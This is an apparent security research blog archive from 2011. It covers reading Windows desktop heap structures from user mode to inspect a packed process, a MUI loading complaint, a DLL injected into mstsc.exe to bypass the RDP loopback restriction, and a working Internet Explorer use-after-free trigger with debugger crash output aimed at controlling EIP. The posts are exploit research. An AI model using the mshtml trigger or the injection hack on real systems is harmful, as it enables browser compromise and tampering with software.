PICTUROKU

Saturday, 1 October 2011

Unpack me if you can

Profiting from Desktop heap information

Having followed all the recent buzz about the kernel part of the Windows graphics and messaging subsystem, I decided to take a look at it to understand how it works and to see whether I could find anything interesting and useful. Inspired by Alex Ionescu's online presentation, I dove into the realms of the desktop heap and started to appreciate the richness of the information available there. This post is about a little game that shows some of the potential behind that data. The game is to run a packed application and, from user mode, try to get some critical information from that process without interfering with it: as passive and non-invasive as possible, without calling the kernel and without touching the packed process in any way.

Note: As always, the full paper is available here.

For the setting, I grabbed a notepad.exe executable from an XP machine and packed it with UPX.

If you want to know why I didn't use notepad.exe from Windows 7, read my last post, "MUI hell". I renamed notepad.exe to popo.exe to avoid any confusion with names, and ran it. Running ProcExp afterwards, one can see that the popo.exe process has high entropy, so it is flagged as a packed image (highlighted in purple).

Figure 1: Packed process
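To make the "high entropy" remark concrete, here is a minimal sketch of a Shannon entropy measurement over a byte buffer. It is only an illustration of the general idea: the function name is hypothetical, and nothing here claims to reproduce the heuristic that ProcExp actually uses to flag packed images.

```python
import math
from collections import Counter


def shannon_entropy(data: bytes) -> float:
    """Return the Shannon entropy of `data` in bits per byte (0.0 to 8.0)."""
    if not data:
        return 0.0
    total = len(data)
    counts = Counter(data)  # occurrences of each byte value
    return -sum((n / total) * math.log2(n / total) for n in counts.values())


# A constant buffer carries no information; a buffer where every byte value
# appears equally often reaches the maximum of 8 bits per byte.
low = shannon_entropy(b"\x00" * 64)
high = shannon_entropy(bytes(range(256)))
```

Compressed or encrypted sections tend to sit close to the upper bound, which is why entropy is a common hint that an image is packed.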

Next, as I needed another GUI process and didn't want to lock explorer.exe, I ran another notepad.exe. This time I used the one from Windows 7.

As a side note, I'm going to jump around between kernel and user debuggers. Please try to keep in mind that the kernel debugger is just used to validate some of the demonstration data.

Continuing, let's find a GUI process :)

!process 0 0 notepad.exe

PROCESS 85cb7d40  SessionId: 1  Cid: 0a14    Peb: 7ffd4000  ParentCid: 0804
    DirBase: 1be3b000  ObjectTable: 998c05d0  HandleCount:  58.
    Image: notepad.exe

From that process, get a GUI thread.

!process

PROCESS 85cb7d40  SessionId: 1  Cid: 0a14    Peb: 7ffd4000  ParentCid: 0804
    DirBase: 1be3b000  ObjectTable: 998c05d0  HandleCount:  58.
    Image: notepad.exe
    VadRoot 84444c88 Vads 70 Clone 0 Private 1454. Modified 1084. Locked 0.

        THREAD 8458d838  Cid 0a14.0a1c  Teb: 7ffdf000 Win32Thread: ff9ba008 WAIT: (WrUserRequest) UserMode Non-Alertable
            84caaec8  SynchronizationEvent

.thread 8458d838  

Implicit thread is now 8458d838

k

  *** Stack trace for last set context - .thread/.cxr resets it

ChildEBP RetAddr 

96b4eb10 82c9ad75 nt!KiSwapContext+0x26

96b4eb48 82c99bd3 nt!KiSwapThread+0x266

96b4eb70 82c9388f nt!KiCommitThreadWait+0x1df

96b4ebe8 915296d6 nt!KeWaitForSingleObject+0x393

96b4ec44 915294e3 win32k!xxxRealSleepThread+0x1d7

96b4ec60 91526550 win32k!xxxSleepThread+0x2d

96b4ecb8 91529aa2 win32k!xxxRealInternalGetMessage+0x4b2

96b4ed1c 82c7487a win32k!NtUserGetMessage+0x3f

96b4ed1c 779c70c6 nt!KiFastCallEntry+0x12a

000ff998 76d7cde0 ntdll!KiIntSystemCall+0x6

000ff99c 76d7ce13 USER32!NtUserGetMessage+0xc

000ff9b8 0080148a USER32!GetMessageW+0x33

000ff9f8 008016ec notepad!WinMain+0xe6

000ffa88 77473c45 notepad!_initterm_e+0x1a1

000ffa94 779e37f5 kernel32!BaseThreadInitThunk+0xe

000ffad4 779e37c8 ntdll!__RtlUserThreadStart+0x70

000ffaec 00000000 ntdll!_RtlUserThreadStart+0x1b

OK, now we need to find out where the desktop heap is mapped.

!teb

TEB at 7ffdf000

dt nt!_TEB 7ffdf000 win*

   +0x040 Win32ThreadInfo : 0xff9ba008 Void
   +0x6cc Win32ClientInfo : [62] 0x20000188
   +0xf6c WinSockData : (null)

dt win32k!tagCLIENTINFO 0x7ffdf6cc

   +0x000 CI_flags         : 0x20000188
   +0x018 pDeskInfo        : 0x01d00578 tagDESKTOPINFO
   +0x01c ulClientDelta    : 0xfcb00000
   +0x028 CallbackWnd      : _CALLBACKWND
   +0x03c pClientThreadInfo : 0x01d0fd68 tagCLIENTTHREADINFO
   +0x064 hKL              : 0x08160816 HKL__
   +0x068 CodePage         : 0x4e4
   +0x06a achDbcsCF        : [2]  ""
   +0x06c msgDbcsCB        : tagMSG
   +0x088 lpdwRegisteredClasses : 0x76dc90d4  -> 0x90

dt win32k!tagDESKTOPINFO 0x01d00578

   +0x000 pvDesktopBase    : 0xfe800000 Void
   +0x004 pvDesktopLimit   : 0xff400000 Void
   +0x008 spwnd            : 0xfe800618 tagWND
   +0x00c fsHooks          : 0x4000
   +0x010 aphkStart        : [16] (null)
   +0x050 spwndShell       : 0xfe8082c0 tagWND
   +0x054 ppiShellProcess  : 0xff9c9608 tagPROCESSINFO
   +0x058 spwndBkGnd       : 0xfe808508 tagWND
   +0x05c spwndTaskman     : 0xfe804428 tagWND
   +0x060 spwndProgman     : (null)
   +0x064 pvwplShellHook   : 0xff919638 VWPL
   +0x068 cntMBox          : 0n0
   +0x06c spwndGestureEngine : (null)
   +0x070 pvwplMessagePPHandler : (null)
   +0x074 fComposited      : 0y0
   +0x074 fIsDwmDesktop    : 0y1

!kvas 0xfe800000

kvas : Show region containing fe800000

### Start    End        Length (  MB)   Count Type
000 fdc00000 ffbfffff  2400000 (  36)        8 SessionSpace

!ptelist 0xfe800000

ptelist : Using fe800000 as VA

VA       |PDE                                 |PTE
FE800000 |Hard Pfn=128E0 Attr=---DA--KWEV     |Hard Pfn=13FE1 Attr=---DA--KWEV

Here we have the kernel address (0xfe800000) of an executable heap on a 32-bit architecture.

According to the WinDbg help: "Executable page. For platforms that do not support a hardware execute/noexecute bit, including many x86 systems, the E is always displayed." That is, basically, wherever NX is not present. Can anyone out there validate the executability of this heap on x64?

So we have a kernel address that we got from user mode, and a heap that we can iterate and validate, also from user mode.

A heap we can fill with GUI objects. Shellcode, anyone? Stack pivoting?

This heap is called the Desktop heap. It is shared between all processes that run on the same desktop and session, regardless of their integrity level, and it is mapped read-only into the user mode region of each of them.

!vad 84444c88

VAD     level      start      end    commit
85ccf578 ( 5)         10       1f         0 Mapped       READWRITE          Pagefile-backed section
...
8458f448 ( 1)        800      82f         4 Mapped  Exe  EXECUTE_WRITECOPY  \Windows\System32\notepad.exe
8518bb90 ( 5)        830     182f        41 Private      READWRITE
85206270 ( 4)       1830     18f7         0 Mapped       READONLY           Pagefile-backed section
845ed280 ( 5)       1900     19de         0 Mapped       READONLY           Pagefile-backed section
84600e10 ( 3)       19e0     19ef         1 Private      READWRITE
85935718 ( 5)       19f0     1aef       128 Private      NO_ACCESS
85cb43e0 ( 4)       1af0     1bef       130 Private      NO_ACCESS
845770c0 ( 2)       1bf0     1cf0         0 Mapped       READONLY           Pagefile-backed section
85220368 ( 4)       1d00     28ff         0 Mapped       READONLY           Pagefile-backed section
85e32560 ( 3)       2900     29ff         2 Private      NO_ACCESS

Although this alone might get you interested in this portion of memory, in this post I'm not going to talk about the potential of this heap for privilege escalation exploits.

I'm going to focus only on tagCLS objects and on what we can do, from a user mode perspective, with the information they provide.

The tagCLS objects are created by the win32k module, specifically by the ClassAlloc function, which allocates them in the Desktop heap when called by InternalRegisterClassEx. This system call path is taken whenever its user32.dll counterpart, the RegisterClassEx function, is used to register a window class (tagWNDCLASSEX).

typedef struct tagWNDCLASSEX {
  UINT      cbSize;
  UINT      style;
  WNDPROC   lpfnWndProc;
  int       cbClsExtra;
  int       cbWndExtra;
  HINSTANCE hInstance;
  HICON     hIcon;
  HCURSOR   hCursor;
  HBRUSH    hbrBackground;
  LPCTSTR   lpszMenuName;
  LPCTSTR   lpszClassName;
  HICON     hIconSm;
} WNDCLASSEX, *PWNDCLASSEX;

Let's see what the Desktop heap has for us, from user mode. To calculate its base address we grab the pDeskInfo member from the TEB's Win32ClientInfo and subtract the offset of the tagDESKTOPINFO inside the heap (0x578: 0x570 bytes of heap metadata plus the 8-byte HEAP_ENTRY header). Having the heap's base address, we can dump it now:

dt nt!_heap 0x01d00000

   +0x000 Entry            : _HEAP_ENTRY
   +0x008 SegmentSignature : 0xffeeffee
   +0x00c SegmentFlags     : 1
   +0x010 SegmentListEntry : _LIST_ENTRY [ 0xfe8000a8 - 0xfe8000a8 ]
   +0x018 Heap             : 0xfe800000 _HEAP
   +0x01c BaseAddress      : 0xfe800000 Void
   +0x020 NumberOfPages    : 0xc00
   +0x024 FirstEntry       : 0xfe800570 _HEAP_ENTRY
   +0x028 LastValidEntry   : 0xff400000 _HEAP_ENTRY
   +0x02c NumberOfUnCommittedPages : 0xbaa
   +0x030 NumberOfUnCommittedRanges : 1
   +0x034 SegmentAllocatorBackTraceIndex : 0
   +0x036 Reserved         : 0
   +0x038 UCRSegmentList   : _LIST_ENTRY [ 0xfe855ff0 - 0xfe855ff0 ]
   +0x064 Signature        : 0xeeffeeff
   +0x0a0 VirtualAllocdBlocks : _LIST_ENTRY [ 0xfe8000a0 - 0xfe8000a0 ]
   +0x0a8 SegmentList      : _LIST_ENTRY [ 0xfe800010 - 0xfe800010 ]
   +0x0b8 BlocksIndex      : 0xfe800138 Void
   +0x0c4 FreeLists        : _LIST_ENTRY [ 0xfe81ef70 - 0xfe8489b8 ]
   +0x0d0 CommitRoutine    : 0x91497343     long  win32k!UserCommitDesktopMemory+0
   +0x0d4 FrontEndHeap     : (null)
   +0x0d8 FrontHeapLockCount : 0
   +0x0da FrontEndHeapType : 0 ''
   +0x0dc Counters         : _HEAP_COUNTERS
   +0x130 TuningParameters : _HEAP_TUNING_PARAMETERS

All this information pertains to kernel mode, but we can easily determine the offset between the kernel mode and user mode mappings (note that it matches the ulClientDelta member of tagCLIENTINFO shown earlier):

?0xfe800000-0x01d00000

Evaluate expression: -55574528 = fcb00000

Since every heap allocation starts with a HEAP_ENTRY header, we can see that the tagDESKTOPINFO is the first entry of the heap:

?0xfe800570+@@(sizeof(nt!_heap_entry))

Evaluate expression: -25164424 = fe800578

?(fe800578&0000ffff)+01d00000 

Evaluate expression: 30410104 = 01d00578

Knowing the offset between kernel mode and user mode mappings of the Desktop heap, we can adjust the kernel addresses found and rebase them to user mode addresses. Doing so allows us to iterate through the whole heap, chunk by chunk.
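The rebasing step can be sketched in a few lines. The constants are the ones from this debugging session; the function names are hypothetical and only illustrate the arithmetic, with results masked to 32 bits because the session is x86.

```python
KERNEL_HEAP_BASE = 0xFE800000  # pvDesktopBase from tagDESKTOPINFO
USER_HEAP_BASE = 0x01D00000    # read-only user mode mapping in this session

# Same value as ulClientDelta in tagCLIENTINFO: 0xfcb00000.
CLIENT_DELTA = (KERNEL_HEAP_BASE - USER_HEAP_BASE) & 0xFFFFFFFF


def kernel_to_user(kaddr: int) -> int:
    """Rebase a desktop heap kernel address to its user mode mapping."""
    return (kaddr - CLIENT_DELTA) & 0xFFFFFFFF


def user_to_kernel(uaddr: int) -> int:
    """Rebase a user mode desktop heap address back to the kernel address."""
    return (uaddr + CLIENT_DELTA) & 0xFFFFFFFF


# The tagDESKTOPINFO found above: kernel fe800578 maps to user 01d00578.
desk_info_user = kernel_to_user(0xFE800578)
```

Subtracting the delta works for any address inside the heap, unlike the `&0000ffff` mask used in the debugger expression, which only holds for the first 64 KB.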

dt nt!_HEAP_ENTRY 01d00570

   +0x000 Size             : 0x10

?01d00570+0x10*8

Evaluate expression: 30410224 = 01d005f0

dt nt!_HEAP_ENTRY 01d005f0

   +0x000 Size             : 4

?01d005f0+0x4*8

Evaluate expression: 30410256 = 01d00610

dt nt!_HEAP_ENTRY 01d00610

   +0x000 Size             : 0x17

Etc. But I said we were going to hunt for tagCLS objects, so let's have a look at them. The size of a tagCLS allocation, including its heap entry header, is:

?@@(sizeof(win32k!tagCLS)+sizeof(nt!_heap_entry))

Evaluate expression: 100 = 00000064

But as 0x64 isn't a multiple of eight, we need to round it up to 0x68, which gives, in 8-byte units:

?68/8

Evaluate expression: 13 = 0000000d

So we need to look for heap entries of size 0xd.
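The same rounding can be written as a small helper. This is a sketch under the assumptions visible in the session: an 8-byte HEAP_ENTRY, an 8-byte allocation granularity, and a tagCLS of 0x5c bytes (0x64 minus the header). The helper name is made up for the example.

```python
HEAP_ENTRY_SIZE = 8   # sizeof(nt!_HEAP_ENTRY) on this x86 system
HEAP_GRANULARITY = 8  # the Size field counts 8-byte units
TAGCLS_SIZE = 0x5C    # sizeof(win32k!tagCLS) in this session


def heap_units(payload_size: int) -> int:
    """Return the HEAP_ENTRY.Size value expected for a payload of this size."""
    total = payload_size + HEAP_ENTRY_SIZE
    # Round up to the next multiple of the granularity, then count units.
    rounded = (total + HEAP_GRANULARITY - 1) & ~(HEAP_GRANULARITY - 1)
    return rounded // HEAP_GRANULARITY


tagcls_units = heap_units(TAGCLS_SIZE)  # 0x64 rounds up to 0x68, i.e. 0xd units
```

As a cross-check, a 0x78-byte tagDESKTOPINFO gives 0x10 units, which is the size of the first entry seen in the manual heap walk.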

Recapitulating, the first heap chunk is a tagDESKTOPINFO.

?@@(sizeof(win32k!tagDESKTOPINFO))

Evaluate expression: 120 = 00000078

?01d00578+0x78

Evaluate expression: 30410224 = 01d005f0

So, our first seekable element is at 01d005f0, which is validated by our previous manual heap walking.
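The manual heap walk can be automated once the read-only mapping has been copied into a buffer. The sketch below assumes, as the debugger output suggests, that the Size field is stored unencoded in the first two bytes of each entry; the function name and the buffer layout are illustrative only.

```python
import struct


def walk_heap_entries(buf: bytes, start: int, granularity: int = 8):
    """Yield (offset, size_in_units) for consecutive heap entries in `buf`.

    `start` is the offset of the first HEAP_ENTRY to visit. The walk stops at
    the end of the buffer or at an entry whose size is zero.
    """
    offset = start
    while offset + 2 <= len(buf):
        (size,) = struct.unpack_from("<H", buf, offset)  # HEAP_ENTRY.Size
        if size == 0:
            break  # corrupt or uncommitted area, stop instead of looping
        yield offset, size
        offset += size * granularity


# Tiny synthetic heap reproducing the three entries walked by hand above
# (sizes 0x10, 4 and 0x17), with offsets relative to 01d00570.
demo = bytearray(0x158)
struct.pack_into("<H", demo, 0x00, 0x10)
struct.pack_into("<H", demo, 0x80, 0x04)
struct.pack_into("<H", demo, 0xA0, 0x17)
entries = list(walk_heap_entries(bytes(demo), 0))
```

Filtering the yielded entries for a size of 0xd would give the tagCLS candidates directly.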

Although I could loop through all the heap entries, as before, I just need to find a first valid tagCLS to validate the data. So let's search for hints of objects sized 0xd:

s -w 01d005f0 l1000 d

01d006c8  000d 0001 0017 0c00 06d0 ff68 8001 8001  ..........h.....

01d00734  000d 0900 3323 3732 3936 fe00 0018 0001  ....#32769......

01d00800  000d 0001 0018 0c00 0808 ff68 c039 c039  ..........h.9.9.

dt nt!_HEAP_ENTRY 01d006c8

   +0x000 Size             : 0xd
   +0x002 Flags            : 0x1 ''
   +0x003 SmallTagIndex    : 0 ''
   +0x000 SubSegmentCode   : 0x0001000d Void
   +0x004 PreviousSize     : 0x17

This seems to be a valid entry. Let's dump it as a tagCLS:

dt win32k!tagCLS 01d006c8+8

   +0x000 pclsNext         : 0xff6806d0 tagCLS
   +0x004 atomClassName    : 0x8001
   +0x006 atomNVClassName  : 0x8001
   +0x008 fnid             : 0x29d
   +0x00c rpdeskParent     : 0x8585d678 tagDESKTOP
   +0x010 pdce             : (null)
   +0x014 hTaskWow         : 0
   +0x016 CSF_flags        : 0x41
   +0x018 lpszClientAnsiMenuName : (null)
   +0x01c lpszClientUnicodeMenuName : (null)
   +0x020 spcpdFirst       : (null)
   +0x024 pclsBase         : 0xffb22758 tagCLS
   +0x028 pclsClone        : (null)
   +0x02c cWndReferenceCount : 0n1
   +0x030 style            : 8
   +0x034 lpfnWndProc      : 0x914fcd91     long  win32k!xxxDesktopWndProc+0
   +0x038 cbclsExtra       : 0n0
   +0x03c cbwndExtra       : 0n0
   +0x040 hModule          : 0x91460000 Void
   +0x044 spicn            : (null)
   +0x048 spcur            : 0xffb75608 tagCURSOR
   +0x04c hbrBackground    : 0x00000002 HBRUSH__
   +0x050 lpszMenuName     : (null)
   +0x054 lpszAnsiClassName : 0xfe800738  "#32769"
   +0x058 spicnSm          : (null)

This is what we need. Let's get the tagDESKTOP address and validate it. This time we'll use the kernel debugger to verify the address, by following the Win32ThreadInfo member of the TEB.

dt win32k!tagTHREADINFO 0xff9ba008 rpdesk

   +0x0c8 rpdesk : 0x8585d678 tagDESKTOP

Yes, it is the same. Now, if we search for all occurrences of this tagDESKTOP address in the Desktop heap and subtract 0xc (the offset of rpdeskParent) from each address found, we get a list of all the tagCLS objects in the heap.

Note that if I were to write a program or script to do this, I'd register a tagWNDCLASSEX with a known lpfnWndProc such as 0xbadecafe, search for this value to locate my own tagCLS object and get the corresponding tagDESKTOP, and then iterate over all the heap items, grabbing those with the same desktop. But, as I'm using the debugger for the demo, it's easier and simpler to do it this way.
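As a rough sketch of the scanning half of such a script, the function below looks for a known tagDESKTOP pointer in a copy of the heap and turns each aligned hit into a candidate tagCLS offset. The 0xc offset comes from the tagCLS layout shown above; the function name and the synthetic buffer are assumptions made for the example.

```python
import struct

RPDESKPARENT_OFFSET = 0x0C  # offset of rpdeskParent inside tagCLS


def find_tagcls_candidates(heap: bytes, desktop_ptr: int) -> list:
    """Return offsets in `heap` where a tagCLS might start.

    Every DWORD-aligned occurrence of `desktop_ptr` is treated as a possible
    rpdeskParent field, so the candidate object starts 0xc bytes earlier.
    """
    needle = struct.pack("<I", desktop_ptr)
    hits = []
    pos = heap.find(needle)
    while pos != -1:
        if pos % 4 == 0 and pos >= RPDESKPARENT_OFFSET:
            hits.append(pos - RPDESKPARENT_OFFSET)
        pos = heap.find(needle, pos + 1)
    return hits


# Synthetic heap: two aligned occurrences and one unaligned one.
demo = bytearray(0x100)
struct.pack_into("<I", demo, 0x1C, 0x8585D678)
struct.pack_into("<I", demo, 0x6C, 0x8585D678)
struct.pack_into("<I", demo, 0x92, 0x8585D678)  # unaligned, ignored
candidates = find_tagcls_candidates(bytes(demo), 0x8585D678)
```

These are only candidates: other object types also store the desktop pointer, so each hit still has to be validated, for instance through the size of its heap entry.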

s -d 01d005f0 l1000000 0x8585d678

01d00624  8585d678 fe800618 00040000 82000100  x...............
01d006dc  8585d678 00000000 00410000 00000000  x.........A.....
01d00754  8585d678 fe800748 00040000 80000100  x...H...........
01d00814  8585d678 00000000 00410000 00000000  x.........A.....
01d0088c  8585d678 fe800880 00040000 80000100  x...............
01d0096c  8585d678 00000000 03410000 00000000  x.........A.....
01d009e4  8585d678 fe8009d8 00000000 00000000  x...............
01d00a2c  8585d678 fe800a20 00000000 00000000  x... ...........
01d00a54  8585d678 00000000 00410000 00000000  x.........A.....

The most interesting parts of a tagCLS are lpfnWndProc and hModule because these are user mode addresses that we can use and validate from user mode.

.foreach (meuval {s -[1]d 01d005f0 l1000000 0x8585d678 })  {
   .if ((poi(${meuval}-0x14)&0x0000ffff) >= 0000000d) {
       .printf "ObjAddr=[%08x], hInstance[%08x], WndProc=",
               poi(${meuval}+18),
               poi(${meuval}+34);
       dds (${meuval}+28) l1;
   }
}

Note: The size check in the command above is "greater than or equal to" the size of a tagCLS, rather than "equal to", because the kernel can reserve some extra space if requested by the user, as indicated by the cbclsExtra class member.
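The same check and field extraction can be sketched outside the debugger. The offsets (0x34 for lpfnWndProc, 0x40 for hModule, heap entry 8 bytes before the object) come from the tagCLS dump above and apply to this 32-bit session only; the function name and the returned dictionary are hypothetical.

```python
import struct

HEAP_ENTRY_SIZE = 8
MIN_TAGCLS_UNITS = 0xD   # smallest heap entry that can hold a tagCLS
OFF_LPFNWNDPROC = 0x34   # tagCLS.lpfnWndProc
OFF_HMODULE = 0x40       # tagCLS.hModule


def read_class_info(heap: bytes, cls_off: int):
    """Return lpfnWndProc and hModule of the tagCLS candidate at `cls_off`.

    Returns None when the candidate does not fit in the buffer or when its
    heap entry is too small to hold a tagCLS.
    """
    if cls_off < HEAP_ENTRY_SIZE or cls_off + OFF_HMODULE + 4 > len(heap):
        return None
    (units,) = struct.unpack_from("<H", heap, cls_off - HEAP_ENTRY_SIZE)
    if units < MIN_TAGCLS_UNITS:  # ">=" because of possible cbclsExtra bytes
        return None
    (wndproc,) = struct.unpack_from("<I", heap, cls_off + OFF_LPFNWNDPROC)
    (hmodule,) = struct.unpack_from("<I", heap, cls_off + OFF_HMODULE)
    return {"lpfnWndProc": wndproc, "hModule": hmodule}


# Synthetic candidate: a 0xd-unit entry at offset 8, object at offset 0x10.
demo = bytearray(0x100)
struct.pack_into("<H", demo, 0x08, 0x0D)
struct.pack_into("<I", demo, 0x10 + OFF_LPFNWNDPROC, 0x01003429)
struct.pack_into("<I", demo, 0x10 + OFF_HMODULE, 0x01000000)
info = read_class_info(bytes(demo), 0x10)
```

Both values are user mode addresses, so they can be checked against the module list of the target process without touching the process itself.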

...
ObjAddr=[fe800ac0], hInstance[00800000], WndProc=01d00af4  008072c5 notepad!NpSaveDialogHookProc+0x97
ObjAddr=[fe800b58], hInstance[76d60000], WndProc=01d00b8c  76d70666 USER32!ImeWndProcW
ObjAddr=[fe800dd0], hInstance[77090000], WndProc=01d00e04  770941b5 MSCTF!UIWndProc
ObjAddr=[fe800e38], hInstance[77090000], WndProc=01d00e6c  770fdd77 MSCTF!UIComposition::CompWndProc
...
ObjAddr=[fe805228], hInstance[749f0000], WndProc=01d0525c  74a1fe38 COMCTL32!CListView::s_WndProc
ObjAddr=[fe805490], hInstance[749f0000], WndProc=01d054c4  74a16022 COMCTL32!Header_WndProc
...
ObjAddr=[fe807320], hInstance[01000000], WndProc=01d07354  01003429
...
ObjAddr=[fe814950], hInstance[70830000], WndProc=01d14984  708432bc
ObjAddr=[fe814ba8], hInstance[70830000], WndProc=01d14bdc  708431dc
ObjAddr=[fe814c40], hInstance[70830000], WndProc=01d14c74  70842954
...
ObjAddr=[fe82b580], hInstance[77820000], WndProc=01d2b5b4  778663e5 ole32!OleMainThreadWndProc
ObjAddr=[fe82cb70], hInstance[00800000], WndProc=01d2cba4  008014de notepad!NPWndProc
...
ObjAddr=[fe842790], hInstance[77090000], WndProc=01d427c4  770fdd77 MSCTF!UIComposition::CompWndProc
ObjAddr=[fe8428a8], hInstance[76d60000], WndProc=01d428dc  76db3f06 USER32!EditWndProcW
ObjAddr=[fe842910], hInstance[749f0000], WndProc=01d42944  749f99d0 COMCTL32!Edit_WndProc
ObjAddr=[fe842ac8], hInstance[749f0000], WndProc=01d42afc  74a90d49 COMCTL32!StatusWndProc
ObjAddr=[fe843c78], hInstance[01010000], WndProc=01d43cac  01044270

Dumping lpfnWndProc and hModule from all the tagCLS objects found in the desktop heap, we can observe that all the window message handlers registered in the system for the current desktop are available for analysis from user mode. From the dump above I've identified two from notepad: NpSaveDialogHookProc and NPWndProc, which is the main window procedure; and module 0x01000000. This entire post is about module 0x01000000.

Module 0x01000000 is popo.exe, as can be seen in ProcExp.

Figure 2: Packed popo.exe module address.

And the WndProc value found at memory position 0x01d07354, 0x01003429, is the NPWndProc window message handler of popo.exe, as seen in the figure. The figure shows the unpacked version of popo.exe so that symbol resolution is available.

Figure 3: Window dispatcher registration.

Figure 4: Window dispatcher registration arguments.

So here you have it: a fine, simple, non-invasive way of getting some information from packed or protected applications.

Other thoughts: Do you think that the same info is available for Protected (Media Path) processes? Those about which we are not supposed to get any info?

Is there any information available for the windows of other desktops in the same session? Can we link this data in any way with the aheList?

Hope you enjoyed it.

Thursday, 22 September 2011

MUI hell

How hateful can Microsoft Windows (sometimes) be? Let me count the times... Well, this one happened while I was doing some experiments with Notepad.exe. As I needed to modify the Notepad.exe binary and didn't want to mess with the installation, I copied it to a temporary folder, changed the binary afterwards and tried to run it.
Hmmm... Nothing happened. I ran it again, and again, and again... Nothing was happening. So I copied it over again and tried to run it, to see if the failure was caused by the patching. Nope. Again, nothing happened. I ran it again, and again, and again... Nothing.

I decided to run Procmon on it, and surprise, surprise, a couple of things failed to be found, namely: the MUI files.

After I copied the missing files from the Windows "en" and "en-US" subdirectories to the temp dir, keeping the directory structure, notepad finally executed.
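The workaround can be scripted. The sketch below assumes the usual `<exe name>.mui` naming inside each language subdirectory, which the post does not spell out, and uses a hypothetical helper name; it simply mirrors whichever of those files exist next to the copied binary.

```python
import shutil
from pathlib import Path


def copy_mui_files(system_dir, target_dir, exe_name, languages=("en", "en-US")):
    """Copy <language>/<exe_name>.mui from system_dir to target_dir.

    The language subdirectory structure is preserved. Returns the list of
    files that were actually copied; missing files are skipped silently.
    """
    copied = []
    for lang in languages:
        src = Path(system_dir) / lang / f"{exe_name}.mui"
        if src.is_file():
            dst_dir = Path(target_dir) / lang
            dst_dir.mkdir(parents=True, exist_ok=True)
            copied.append(Path(shutil.copy2(src, dst_dir / src.name)))
    return copied
```

A call such as `copy_mui_files(r"C:\Windows\System32", r"C:\temp", "notepad.exe")` would then place the resource files where the copied binary expects them; the paths here are only examples.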

Doing the same with Calc.exe, guess what?

Who's responsible for this? A stupid function exported from ntdll called LdrpLoadResourceFromAlternativeModule.
This function gets called when Notepad.exe and Calc.exe try to load resource strings from the binary.

Oh, and this seems to break UPX....

What the hell?

Tuesday, 20 September 2011

Inside Job (or give me a loop)

Let's pretend I'm a System Administrator (:)), and I've got to tweak some features and install some software on my client PCs and servers for end users and programmers.
I'm logged in as Administrator, so some of the policies and configurations I'm pushing don't apply to my account.
I need to log in as a test user with memberships similar to my clients' to verify that everything is working and in place. At the same time I'd like to keep my admin session open, so I can make some adjustments to the configuration.
If I'm logged in at a workstation console and I try to open a different session as another user, I'm obliged to use the 'Fast user switching' service. But this locks my previous admin session. If, while still logged in at the computer's console, I try to open an RDP connection to the machine, I get an error reporting that I'm already connected to the console of the local computer.

But all this is possible as long as I use remote sessions from a Windows Server product. That is to say, you can loop back through RDP in Windows Server, meaning that something is different in its RDP implementation. Could it be that the client is different from the one in the Workstation product? I can't even see the remote console connection.

What is the logic of this? In Windows Professional Edition, this happens because of a Microsoft policy that allows only one console session at a time. But, as the server edition has an admin remote console mode, shouldn't the same concept apply to the workstation edition? Why can't I open a new RDP session through localhost, or the loopback interface, while logged in at the console?

I don't know.

Trying to understand the reasoning behind this limitation, I determined that the loopback block resides in the client and not in the server.
The key lies in a COM object provided by mstscax.dll.
I developed a PoC tool that demonstrates just this. The tool is a DLL called gimmelooprdp.dll, available here, that you can inject into an mstsc.exe RDP client. Run mstsc.exe, get its PID, and use a DLL injection tool to inject the DLL into the mstsc.exe process.

Afterwards you can proceed as usual. Set the machine's local address in the Computer field and press Connect. The tool only works on Windows XP SP2 (as Microsoft no longer offers support for it, I hope they don't get annoyed by this hack). So, you'll be able to establish the connection but, as Windows XP Pro only allows one session at a time, your primary console session will be logged off. If you wish to proceed with two open sessions in the Professional edition, it is indeed possible, but you'll have to 'explode' the sessions (see my previous post 'Exploding sessions').

The dll can be downloaded here.

Thursday, 1 September 2011

Diaries of vulnerability - take 2

Stage 1 exploit - Controlling EIP

A friend of mine mentioned that he wasn't able to run the original exploit published by d0c_s4vage on his machine. Another one pointed out that he didn't understand why the original exploit used a block size of 0xE0 for heap spraying, even though the object used after free was a CTreeNode of size 0x4C. I thought this was good motivation for a post, so here it is.

Note: I'll make this post simpler than the first part, so I'll skip some explanations along the way. I'll also leave the first point for another post, as its analysis needs some background that will be covered by the explanation of the second point in this post.

Note 2: Again, the nicely formatted paper is available here for download.

Let's begin with a slight variation of the exploit, so that we can test it more conveniently:

<html>
   <body>
     <script language='javascript'>
       document.body.innerHTML += "<object align='right' width='1000'>TAG_1</object>";
       document.body.innerHTML += "<a style='float:left;'>TAG_3</a>A";
       document.body.innerHTML += "A";
       document.body.innerHTML += "<strong id='popo' style='font-size:1000pc; margin:auto -1000cm auto auto;' dir='ltr'></strong>";
       document.getElementById('popo').innerHTML = "Z";
     </script>
   </body>
</html>

And these breakpoints:

bp mshtml!CTreeNode::CTreeNode ".printf \" CTreeNode:node[%08x] Type:\",ecx;dds edi l1; gc;"
bp mshtml!CObjectElement::CObjectElement ".printf \" CObjectElement:addr[%08x] \\n\",esi;gc"

Let's review some history:

CObjectElement:addr[004150e8]

CTreeNode:node[0042adb0] Type:mshtml!CObjectElement::`vftable'

CTreeNode:node[0042b1d0] Type:mshtml!CAnchorElement::`vftable'

CTreeNode:node[0042b280] Type:mshtml!CPhraseElement::`vftable'

CTreeNode:node[0042adb0] Type:mshtml!CObjectElement::`vftable'

CTreeNode:node[0042b1d0] Type:mshtml!CAnchorElement::`vftable'

...

CTreeNode:node[0042ae60] Type:mshtml!CBodyElement::`vftable'
(b60.2e0): Access violation - code c0000005 (first chance)
First chance exceptions are reported before any exception handling.
This exception may be expected and handled.
eax=00000000 ebx=0042adb0 ecx=0041010a edx=00000000 esi=01ffbc20 edi=00000000
eip=6987b68f esp=01ffbbf4 ebp=01ffbc0c iopl=0 nv up ei pl zr na pe nc
cs=001b ss=0023 ds=0023 es=0023 fs=003b gs=0000 efl=00010246
mshtml!CElement::Doc+0x2:
6987b68f 8b5070 mov edx,dword ptr [eax+70h] ds:0023:00000070=????????

ub mshtml!CElement::Doc:
6987b68d 8b01 mov eax,dword ptr [ecx]

dc ebx
0042adb0 0041010a 00000000 ffff404a ffffffff ..A.....J@......

